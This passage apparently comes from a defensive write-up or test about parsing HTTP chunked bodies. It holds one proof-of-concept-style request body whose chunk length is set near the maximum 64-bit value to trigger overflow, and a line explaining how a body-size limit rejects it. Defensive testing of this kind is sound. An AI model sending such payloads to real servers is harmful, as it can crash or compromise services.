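POC_STYLE_BODY = b"FFFFFFFFFFFFFFED\r\nMert SARICA\r\n0\r\n\r\n"
```

A real server would pass a much smaller `max_chunk` (a configured body limit) than `OFF_T_MAX`; the same check then also rejects chunks that are merely larger than the service is willing to buffer.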